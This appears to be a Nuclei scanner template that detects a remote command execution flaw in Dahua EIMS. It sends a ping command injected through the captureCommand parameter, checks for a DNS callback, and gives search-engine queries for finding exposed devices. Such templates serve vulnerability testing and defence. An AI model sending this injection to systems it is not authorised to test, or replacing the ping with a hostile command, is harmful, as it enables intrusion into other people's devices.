dahua-eims-rce: Dahua EIMS - Remote Command Execution

id: dahua-eims-rce

info:
  name: Dahua EIMS - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Dahua EIMS capture_handle interface allows remote command execution.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://cn-sec.com/archives/2554372.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: "<title>eims</title>"
    zoomeye-query: app="大华 EIMS"
  tags: dahua,rce,eims,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: regex
        regex:
          - "^success$"
# digest: 490a00463044022024a3886038e62029f1177c5fb254cdc0c203fc23bc75c4d847bb89e9829a9a6d022078aca2e49cc5060b69ab42dbbfa81fceb2ad9bfdd1b97d5d632ef5405be9c49f:922c64590222798bb761d5b6d8e72950